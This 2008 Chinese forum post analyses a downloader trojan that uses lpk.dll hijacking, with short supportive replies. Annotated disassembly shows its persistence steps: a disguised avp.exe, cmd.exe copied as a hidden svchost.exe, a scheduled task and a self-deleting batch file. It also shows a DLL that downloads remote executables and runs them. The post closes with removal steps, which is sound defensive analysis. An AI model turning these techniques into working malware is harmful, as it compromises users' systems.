分析一个简单的DLL劫持下载者

zzage 发表于 2008-12-1 17:09

【文章标题】分析一个简单的DLL劫持下载者
【文章作者】ZzAge
【文章目标】某个下载者
【相关工具】ida,ollydbg
【作者 Q Q】85400516
【作者邮箱】zzage@163.com
【作者主页】http://hi.baidu.com/zzage
【文章日期】2008年12月01日

一创建互斥体

CODE:00404844             push ebx
CODE:00404845             push offset Name ; lpName //'exe'
CODE:0040484A             push 0FFFFFFFFh    ; int
CODE:0040484C             push 0             ; lpMutexAttributes
CODE:0040484E             call sub_403EC4    //互斥体的构建函数
CODE:00404853             call GetLastError_0
CODE:00404858             cmp eax, 0B7h
CODE:0040485D             jnz short loc_404861
CODE:0040485F             mov bl, 1
CODE:00404861
CODE:00404861 loc_404861:                         ; CODE XREF: sub_404844+19j
CODE:00404861             mov eax, ebx
CODE:00404863             pop ebx
CODE:00404864             retn

二取Windows目录

CODE:004041DB             push 100h          ; uSize
CODE:004041E0             push ebx          ; lpBuffer
CODE:004041E1             call GetWindowsDirectoryA

三删除计划任务C:\WINDOWS\Tasks\At1.job文件

CODE:004041FD             mov edx, offset dword_404530//'\tasks\at1.job'
CODE:00404202             call sub_403760
CODE:00404207             mov eax,
CODE:0040420A             call sub_403840
CODE:0040420F             push eax          ; lpFileName
CODE:00404210             call DeleteFileA

四把Windows目录下的wsock32x.dll,lpk.dll,avp.exe的文件属性设置为正常，并且删除其文件,然后把木马自身复制到Windows目录下，新命名为avp.exe。

CODE:0040422C             mov edx, offset dword_404548//'\wsock32x.dll'
CODE:00404231             call sub_403760
CODE:00404236             mov eax,
CODE:00404239             call sub_403840
CODE:0040423E             push eax          ; lpFileName
CODE:0040423F             call SetFileAttributesA
CODE:00404244             push 80h          ; dwFileAttributes
CODE:00404249             lea eax,
CODE:0040424C             mov edx, ebx
CODE:0040424E             mov ecx, 101h
CODE:00404253             call sub_403740
CODE:00404258             lea eax,
CODE:0040425B             mov edx, offset dword_404560 //'\lpk.dll'
CODE:00404260             call sub_403760
CODE:00404265             mov eax,
CODE:00404268             call sub_403840
CODE:0040426D             push eax          ; lpFileName
CODE:0040426E             call SetFileAttributesA
CODE:00404273             push 80h          ; dwFileAttributes
CODE:00404278             lea eax,
CODE:0040427B             mov edx, ebx
CODE:0040427D             mov ecx, 101h
CODE:00404282             call sub_403740
CODE:00404287             lea eax,
CODE:0040428A             mov edx, offset dword_404574 //'\avp.exe'
CODE:0040428F             call sub_403760
CODE:00404294             mov eax,
CODE:00404297             call sub_403840
CODE:0040429C             push eax          ; lpFileName
CODE:0040429D             call SetFileAttributesA
CODE:004042A2             lea eax,
CODE:004042A5             mov edx, ebx
CODE:004042A7             mov ecx, 101h
CODE:004042AC             call sub_403740
CODE:004042B1             lea eax,
CODE:004042B4             mov edx, offset dword_404548 //'\wsock32x.dll'
CODE:004042B9             call sub_403760
CODE:004042BE             mov eax,
CODE:004042C1             call sub_403840
CODE:004042C6             push eax          ; lpFileName
CODE:004042C7             call DeleteFileA
CODE:004042CC             lea eax,
CODE:004042CF             mov edx, ebx
CODE:004042D1             mov ecx, 101h
CODE:004042D6             call sub_403740
CODE:004042DB             lea eax,
CODE:004042DE             mov edx, offset dword_404560 //'\lpk.dll'
CODE:004042E3             call sub_403760
CODE:004042E8             mov eax,
CODE:004042EB             call sub_403840
CODE:004042F0             push eax          ; lpFileName
CODE:004042F1             call DeleteFileA
CODE:004042F6             lea eax,
CODE:004042F9             mov edx, ebx
CODE:004042FB             mov ecx, 101h
CODE:00404300             call sub_403740
CODE:00404305             lea eax,
CODE:00404308             mov edx, offset dword_404574 //'\avp.exe'
CODE:0040430D             call sub_403760
CODE:00404312             mov eax,
CODE:00404315             call sub_403840
CODE:0040431A             push eax          ; lpFileName
CODE:0040431B             call DeleteFileA
CODE:00404320             push 0             ; bFailIfExists
CODE:00404322             lea eax,
CODE:00404325             mov edx, ebx
CODE:00404327             mov ecx, 101h
CODE:0040432C             call sub_403740
CODE:00404331             lea eax,
CODE:00404334             mov edx, offset dword_404574 //'\avp.exe'
CODE:00404339             call sub_403760
CODE:0040433E             mov eax,
CODE:00404341             call sub_403840
CODE:00404346             push eax          ; lpNewFileName
CODE:00404347             lea edx,
CODE:0040434A             xor eax, eax
CODE:0040434C             call sub_4026F0
CODE:00404351             mov eax,
CODE:00404354             call sub_403840
CODE:00404359             push eax          ; lpExistingFileName
CODE:0040435A             call CopyFileA

五释放lpk.dll和wsock32x.dll到Windows目录下

CODE:00404371             mov edx, offset dword_404560;"\lpk.dll"
CODE:00404376             call sub_403760
CODE:0040437B             mov ecx,
CODE:0040437E             mov edx, offset dword_404588;"LPK"
CODE:00404383             mov eax, offset aExefile ; "exefile"
CODE:00404388             call sub_4040A8 //资源释放过程
CODE:0040438D             lea eax,
CODE:00404390             mov edx, ebx
CODE:00404392             mov ecx, 101h
CODE:00404397             call sub_403740
CODE:0040439C             lea eax,
CODE:0040439F             mov edx, offset dword_404548;"wsock32x.dll"
CODE:004043A4             call sub_403760
CODE:004043A9             mov ecx,
CODE:004043AC             mov edx, offset aWsock32x ; "wsock32x"
CODE:004043B1             mov eax, offset aExefile ; "exefile"
CODE:004043B6             call sub_4040A8//资源释放过程

六把system32目录下的CMD，复制到Windows目录下,并命名为svchost.exe,然后对svchost.exe,avp.exe,wsock32x.dll,lpk.dll的文件属性设置为只读,隐藏,系统,然后运行svchost.exe

CODE:004043BB             push 0             ; bFailIfExists
CODE:004043BD             lea eax,
CODE:004043C0             mov edx, ebx
CODE:004043C2             mov ecx, 101h
CODE:004043C7             call sub_403740
CODE:004043CC             lea eax,
CODE:004043CF             mov edx, offset dword_4045B8 ;"\svchost.exe"
CODE:004043D4             call sub_403760
CODE:004043D9             mov eax,
CODE:004043DC             call sub_403840
CODE:004043E1             push eax          ; lpNewFileName
CODE:004043E2             lea eax,
CODE:004043E5             mov edx, ebx
CODE:004043E7             mov ecx, 101h
CODE:004043EC             call sub_403740
CODE:004043F1             lea eax,
CODE:004043F4             mov edx, offset aSystem32Cmd_ex ; "\\system32\\cmd.exe"
CODE:004043F9             call sub_403760
CODE:004043FE             mov eax,
CODE:00404401             call sub_403840
CODE:00404406             push eax          ; lpExistingFileName
CODE:00404407             call CopyFileA
CODE:0040440C             push 23h          ; dwFileAttributes
CODE:0040440E             lea eax,
CODE:00404411             mov edx, ebx
CODE:00404413             mov ecx, 101h
CODE:00404418             call sub_403740
CODE:0040441D             lea eax,
CODE:00404420             mov edx, offset dword_4045B8 ;"\svchost.exe"
CODE:00404425             call sub_403760
CODE:0040442A             mov eax,
CODE:0040442D             call sub_403840
CODE:00404432             push eax          ; lpFileName
CODE:00404433             call SetFileAttributesA
CODE:00404438             push 23h          ; dwFileAttributes
CODE:0040443A             lea eax,
CODE:0040443D             mov edx, ebx
CODE:0040443F             mov ecx, 101h
CODE:00404444             call sub_403740
CODE:00404449             lea eax,
CODE:0040444C             mov edx, offset dword_404574;"\avp.exe"
CODE:00404451             call sub_403760
CODE:00404456             mov eax,
CODE:00404459             call sub_403840
CODE:0040445E             push eax          ; lpFileName
CODE:0040445F             call SetFileAttributesA
CODE:00404464             push 23h          ; dwFileAttributes
CODE:00404466             lea eax,
CODE:00404469             mov edx, ebx
CODE:0040446B             mov ecx, 101h
CODE:00404470             call sub_403740
CODE:00404475             lea eax,
CODE:00404478             mov edx, offset dword_404548;"\wsock32x.dll"
CODE:0040447D             call sub_403760
CODE:00404482             mov eax,
CODE:00404485             call sub_403840
CODE:0040448A             push eax          ; lpFileName
CODE:0040448B             call SetFileAttributesA
CODE:00404490             push 23h          ; dwFileAttributes
CODE:00404492             lea eax,
CODE:00404495             mov edx, ebx
CODE:00404497             mov ecx, 101h
CODE:0040449C             call sub_403740
CODE:004044A1             lea eax,
CODE:004044A4             mov edx, offset dword_404560;"\lpk.dll"
CODE:004044A9             call sub_403760
CODE:004044AE             mov eax,
CODE:004044B1             call sub_403840
CODE:004044B6             push eax          ; lpFileName
CODE:004044B7             call SetFileAttributesA
CODE:004044BC             push 0             ; uCmdShow
CODE:004044BE             lea eax,
CODE:004044C1             mov edx, ebx
CODE:004044C3             mov ecx, 101h
CODE:004044C8             call sub_403740
CODE:004044CD             lea eax,
CODE:004044D0             mov edx, offset dword_4045B8;"\svchost.exe"
CODE:004044D5             call sub_403760
CODE:004044DA             mov eax,
CODE:004044DD             call sub_403840
CODE:004044E2             push eax          ; lpCmdLine
CODE:004044E3             call WinExec

七为avp.exe木马文件添加一个计划任务,达到指定时间运行木马的目的

CODE:00403F84             push ebp
CODE:00403F85             mov ebp, esp
CODE:00403F87             add esp, 0FFFFFEF0h
CODE:00403F8D             push ebx
CODE:00403F8E             push esi
CODE:00403F8F             xor eax, eax
CODE:00403F91             mov , eax
CODE:00403F97             mov , eax
CODE:00403F9A             xor eax, eax
CODE:00403F9C             push ebp
CODE:00403F9D             push offset loc_404048
CODE:00403FA2             push dword ptr fs:
CODE:00403FA5             mov fs:, esp
CODE:00403FA8             push 100h          ; uSize
CODE:00403FAD             lea eax,
CODE:00403FB3             push eax          ; lpBuffer
CODE:00403FB4             call GetWindowsDirectoryA
CODE:00403FB9             lea eax,
CODE:00403FBC             lea edx,
CODE:00403FC2             mov ecx, 101h
CODE:00403FC7             call sub_4039D0
CODE:00403FCC             mov eax, 10h
CODE:00403FD1             call sub_4024A0
CODE:00403FD6             mov esi, eax
CODE:00403FD8             mov eax, 4
CODE:00403FDD             call sub_4024A0
CODE:00403FE2             mov , eax
CODE:00403FE5             mov dword ptr , 9
CODE:00403FEB             xor eax, eax
CODE:00403FED             mov , eax
CODE:00403FF0             mov byte ptr , 0
CODE:00403FF4             lea eax,
CODE:00403FFA             mov ecx, offset aAvp_exe ; "\\avp.exe"
CODE:00403FFF             mov edx,
CODE:00404002             call sub_403A04
CODE:00404007             mov eax,
CODE:0040400D             call sub_4039E8
CODE:00404012             mov , eax
CODE:00404015             mov byte ptr , 1
CODE:00404019             lea eax,
CODE:0040401C             push eax          ; JobId
CODE:0040401D             push esi          ; Buffer
CODE:0040401E             push 0             ; Servername
CODE:00404020             call NetScheduleJobAdd
CODE:00404025             test eax, eax
CODE:00404027             xor eax, eax
CODE:00404029             pop edx
CODE:0040402A             pop ecx
CODE:0040402B             pop ecx
CODE:0040402C             mov fs:, edx
CODE:0040402F             push offset loc_40404F
CODE:00404034
CODE:00404034 loc_404034:                         ; CODE XREF: sub_403F84+C9j
CODE:00404034             lea eax,
CODE:0040403A             call sub_403908
CODE:0040403F             lea eax,
CODE:00404042             call sub_403908
CODE:00404047             retn

八创建一个批处理,然后调用CreateProcessA运行批处理,删除自身!整个木马的EXE的流程就这样,比较简单~

CODE:004045E4             push ebp
CODE:004045E5             mov ebp, esp
CODE:004045E7             add esp, 0FFFFFDCCh
CODE:004045ED             xor edx, edx
CODE:004045EF             mov , edx
CODE:004045F5             mov , edx
CODE:004045FB             mov , edx
CODE:00404601             mov , edx
CODE:00404607             mov , edx
CODE:0040460A             xor eax, eax
CODE:0040460C             push ebp
CODE:0040460D             push offset loc_4047BD
CODE:00404612             push dword ptr fs:
CODE:00404615             mov fs:, esp
CODE:00404618             nop
CODE:00404619             nop
CODE:0040461A             nop
CODE:0040461B             nop
CODE:0040461C             nop
CODE:0040461D             push eax
CODE:0040461E             pop eax
CODE:0040461F             nop
CODE:00404620             lea eax,
CODE:00404623             mov edx, offset aCDeleteme_bat ; "c:\\Deleteme.bat"
CODE:00404628             call sub_40369C
CODE:0040462D             mov edx,
CODE:00404630             lea eax,
CODE:00404636             call sub_402A0C
CODE:0040463B             lea eax,
CODE:00404641             call sub_4027A8
CODE:00404646             call sub_402594
CODE:0040464B             mov edx, offset dword_4047E8
CODE:00404650             lea eax,
CODE:00404656             call sub_4038B0
CODE:0040465B             call sub_402D28
CODE:00404660             call sub_402594
CODE:00404665             push offset dword_4047F8
CODE:0040466A             lea edx,
CODE:00404670             xor eax, eax
CODE:00404672             call sub_4026F0
CODE:00404677             push
CODE:0040467D             push offset dword_404808
CODE:00404682             lea eax,
CODE:00404688             mov edx, 3
CODE:0040468D             call sub_4037A4
CODE:00404692             mov edx,
CODE:00404698             lea eax,
CODE:0040469E             call sub_4038B0
CODE:004046A3             call sub_402D28
CODE:004046A8             call sub_402594
CODE:004046AD             push offset dword_404814
CODE:004046B2             lea edx,
CODE:004046B8             xor eax, eax
CODE:004046BA             call sub_4026F0
CODE:004046BF             push
CODE:004046C5             push offset dword_404808
CODE:004046CA             push offset dword_404828
CODE:004046CF             lea eax,
CODE:004046D5             mov edx, 4
CODE:004046DA             call sub_4037A4
CODE:004046DF             mov edx,
CODE:004046E5             lea eax,
CODE:004046EB             call sub_4038B0
CODE:004046F0             call sub_402D28
CODE:004046F5             call sub_402594
CODE:004046FA             mov edx, offset dword_40483C
CODE:004046FF             lea eax,
CODE:00404705             call sub_4038B0
CODE:0040470A             call sub_402D28
CODE:0040470F             call sub_402594
CODE:00404714             lea eax,
CODE:0040471A             call sub_402AC8
CODE:0040471F             call sub_402594
CODE:00404724             lea eax,
CODE:0040472A             xor ecx, ecx
CODE:0040472C             mov edx, 44h
CODE:00404731             call sub_402B20
CODE:00404736             mov , 1
CODE:00404740             mov , 0
CODE:00404749             lea eax,
CODE:0040474F             push eax          ; lpProcessInformation
CODE:00404750             lea eax,
CODE:00404756             push eax          ; lpStartupInfo
CODE:00404757             push 0             ; lpCurrentDirectory
CODE:00404759             push 0             ; lpEnvironment
CODE:0040475B             push 40h          ; dwCreationFlags
CODE:0040475D             push 0             ; bInheritHandles
CODE:0040475F             push 0             ; lpThreadAttributes
CODE:00404761             push 0             ; lpProcessAttributes
CODE:00404763             mov eax,
CODE:00404766             call sub_403840
CODE:0040476B             push eax          ; lpCommandLine
CODE:0040476C             push 0             ; lpApplicationName
CODE:0040476E             call CreateProcessA
CODE:00404773             test eax, eax
CODE:00404775             jz    short loc_40478F
CODE:00404777             mov eax,
CODE:0040477D             push eax          ; hObject
CODE:0040477E             call CloseHandle_0
CODE:00404783             mov eax,
CODE:00404789             push eax          ; hObject
CODE:0040478A             call CloseHandle_0
CODE:0040478F
CODE:0040478F loc_40478F:                         ; CODE XREF: sub_4045E4+191j
CODE:0040478F             nop
CODE:00404790             nop
CODE:00404791             nop
CODE:00404792             nop
CODE:00404793             nop
CODE:00404794             push eax
CODE:00404795             pop eax
CODE:00404796             nop
CODE:00404797             xor eax, eax
CODE:00404799             pop edx
CODE:0040479A             pop ecx
CODE:0040479B             pop ecx
CODE:0040479C             mov fs:, edx
CODE:0040479F             push offset loc_4047C4
CODE:004047A4
CODE:004047A4 loc_4047A4:                         ; CODE XREF: sub_4045E4+1DEj
CODE:004047A4             lea eax,
CODE:004047AA             mov edx, 4
CODE:004047AF             call sub_403628
CODE:004047B4             lea eax,
CODE:004047B7             call sub_403604
CODE:004047BC             retn

LPK.dll的程序流程

一创建线程

.data:10001253             push esi
.data:10001254             jnz short loc_10001294
.data:10001256             push 0             ; lpThreadId
.data:10001258             push 0             ; dwCreationFlags
.data:1000125A             push 0             ; lpParameter
.data:1000125C             push offset StartAddress ; lpStartAddress
.data:10001261             push 0             ; dwStackSize
.data:10001263             push 0             ; lpThreadAttributes
.data:10001265             call CreateThread
.data:1000126B             push ; hLibModule
.data:1000126F             call DisableThreadLibraryCalls

二加载wsock32x.dll
.data:1000123D             push offset LibFileName ; "wsock32x.dll"
.data:10001242             call LoadLibraryA
.data:10001248             push 1
.data:1000124A             pop eax
.data:1000124B             retn 4

wsock32x.dll的程序流程

一下载过程

003E841E .55          push ebp
003E841F .68 45863E00 push 003E8645
003E8424 .64:FF30    push dword ptr fs:
003E8427 .64:8920    mov dword ptr fs:, esp
003E842A .68 54863E00 push 003E8654                      ; /urlmon.dll
003E842F .E8 C8C7FFFF call <jmp.&kernel32.LoadLibraryA> ; \LoadLibraryA
003E8434 .6A 00       push 0
003E8436 .6A 00       push 0
003E8438 .8D95 24FEFFFF lea edx, dword ptr
003E843E .B8 01000000 mov eax, 1
003E8443 .E8 60FFFFFF call 003E83A8                      ;取临时文件夹路径
003E8448 .8D85 24FEFFFF lea eax, dword ptr
003E844E .BA 68863E00 mov edx, 003E8668                ;gk_drf.txt
003E8453 .E8 38BAFFFF call 003E3E90
003E8458 .8B85 24FEFFFF mov eax, dword ptr
003E845E .E8 FDBAFFFF call 003E3F60
003E8463 .50          push eax
003E8464 .A1 A8923E00 mov eax, dword ptr
003E8469 .50          push eax
003E846A    6A 00       push 0
003E846C    E8 EBFEFFFF call <jmp.&URLMON.URLDownloadToFileA> ;把远程服务器的txt文件下载到临时文件夹
003E8471 .6A FF       push -1                            ; /Alertable = TRUE
003E8473 .68 C8000000 push 0C8                            ; |Timeout = 200. ms
003E8478 .E8 87C7FFFF call <jmp.&kernel32.SleepEx>       ; \SleepEx
003E847D .33C0       xor eax, eax
003E847F .55          push ebp
003E8480 .68 10863E00 push 003E8610
003E8485 .64:FF30    push dword ptr fs:
003E8488 .64:8920    mov dword ptr fs:, esp
003E848B .8D95 20FEFFFF lea edx, dword ptr
003E8491 .B8 01000000 mov eax, 1
003E8496 .E8 0DFFFFFF call 003E83A8                      ;取临时文件夹路径
003E849B .8D85 20FEFFFF lea eax, dword ptr
003E84A1 .BA 68863E00 mov edx, 003E8668                ;gk_drf.txt
003E84A6 .E8 E5B9FFFF call 003E3E90
003E84AB .8B95 20FEFFFF mov edx, dword ptr
003E84B1 .8D85 28FEFFFF lea eax, dword ptr
003E84B7 .E8 BCA4FFFF call 003E2978                      ;开始读取下载后的txt文件里面的下载地址
003E84BC .8D85 28FEFFFF lea eax, dword ptr
003E84C2 .E8 4DA2FFFF call 003E2714
003E84C7 .E8 60A1FFFF call 003E262C
003E84CC .33C0       xor eax, eax
003E84CE .8945 FC    mov dword ptr , eax
003E84D1 .E9 08010000 jmp 003E85DE
003E84D6 >FF45 FC    inc dword ptr
003E84D9 .8D55 F4    lea edx, dword ptr
003E84DC .8D85 28FEFFFF lea eax, dword ptr
003E84E2 .E8 31A7FFFF call 003E2C18
003E84E7 .8D85 28FEFFFF lea eax, dword ptr
003E84ED .E8 92A7FFFF call 003E2C84
003E84F2 .E8 35A1FFFF call 003E262C
003E84F7 .8D45 F8    lea eax, dword ptr
003E84FA .8B55 F4    mov edx, dword ptr
003E84FD .E8 9EB7FFFF call 003E3CA0
003E8502 .33C0       xor eax, eax
003E8504 .55          push ebp
003E8505 .68 D4853E00 push 003E85D4
003E850A .64:FF30    push dword ptr fs:
003E850D .64:8920    mov dword ptr fs:, esp
003E8510 .6A 00       push 0
003E8512 .6A 00       push 0
003E8514 .8D95 18FEFFFF lea edx, dword ptr
003E851A .B8 01000000 mov eax, 1
003E851F .E8 84FEFFFF call 003E83A8                      ;取临时文件夹路径
003E8524 .FFB5 18FEFFFF push dword ptr
003E852A .8D95 14FEFFFF lea edx, dword ptr
003E8530 .8B45 FC    mov eax, dword ptr
003E8533 .E8 68D4FFFF call 003E59A0
003E8538 .FFB5 14FEFFFF push dword ptr
003E853E .68 7C863E00 push 003E867C                      ;.exe
003E8543 .8D85 1CFEFFFF lea eax, dword ptr
003E8549 .BA 03000000 mov edx, 3
003E854E .E8 81B9FFFF call 003E3ED4
003E8553 .8B85 1CFEFFFF mov eax, dword ptr
003E8559 .E8 02BAFFFF call 003E3F60
003E855E .50          push eax
003E855F .8B45 F8    mov eax, dword ptr
003E8562 .E8 F9B9FFFF call 003E3F60
003E8567 .50          push eax
003E8568 .6A 00       push 0
003E856A .E8 EDFDFFFF call <jmp.&URLMON.URLDownloadToFileA> ;开始下载木马
003E856F .6A FF       push -1                            ; /Alertable = TRUE
003E8571 .6A 64       push 64                            ; |Timeout = 100. ms
003E8573 .E8 8CC6FFFF call <jmp.&kernel32.SleepEx>       ; \SleepEx
003E8578 .6A 00       push 0
003E857A .8D95 0CFEFFFF lea edx, dword ptr
003E8580 .B8 01000000 mov eax, 1
003E8585 .E8 1EFEFFFF call 003E83A8
003E858A .FFB5 0CFEFFFF push dword ptr
003E8590 .8D95 08FEFFFF lea edx, dword ptr
003E8596 .8B45 FC    mov eax, dword ptr
003E8599 .E8 02D4FFFF call 003E59A0
003E859E .FFB5 08FEFFFF push dword ptr
003E85A4 .68 7C863E00 push 003E867C                      ;.exe
003E85A9 .8D85 10FEFFFF lea eax, dword ptr
003E85AF .BA 03000000 mov edx, 3
003E85B4 .E8 1BB9FFFF call 003E3ED4
003E85B9 .8B85 10FEFFFF mov eax, dword ptr
003E85BF .E8 9CB9FFFF call 003E3F60                      ;运行下载后的木马
003E85C4 .50          push eax                            ; |CmdLine
003E85C5 .E8 4AC6FFFF call <jmp.&kernel32.WinExec>       ; \WinExec

这个下载者主要就是运行改名伪装的的cmd.exe,然后利用lpk.dll这特殊的DLL进行劫持,加载wsock32x.dll这个具有下载功能的DLL

详细的DLL劫持解说,大家可以去看海风大牛的《神奇的马甲Dll 》,贴子地址：http://www.unpack.cn/viewthread.php?tid=26167

清除的方法：删除计划任务,Windows目录下的wsock32x.dll,lpk.dll,avp.exe 即可...

只是一个简单的下载者分析,不要扔砖头啊....

-------------From:ZzAge {www.52pojie.cn}-------------------

niliu 发表于 2008-12-1 17:13

占楼。。出售。

鬼手发表于 2008-12-1 17:14

站2楼,等人来买.呵呵支持Z大!

Squn 发表于 2008-12-1 17:16

太喜欢ZZ这样类型的文章了。真是太爽了。

小生我怕怕 发表于 2008-12-1 17:22

神牛的文章那里能不顶一顶!

shaopeng 发表于 2008-12-1 17:38

支持一下。什么时候发工资呀

evilangel 发表于 2008-12-1 19:36

:loveliness: 支持Z大了啊我也来充数了啊

dlzc 发表于 2008-12-1 22:13

我也来支持ZZ大侠了....充个数.占个位...:call:

午夜狂吻 发表于 2008-12-3 01:02

支持大大！！

呵呵！！

wlxinguang 发表于 2008-12-4 09:01

经典，这个板块真的不错，加油

页: [1] 2 3

吾爱破解 - 52pojie.cn's Archiver

分析一个简单的DLL劫持下载者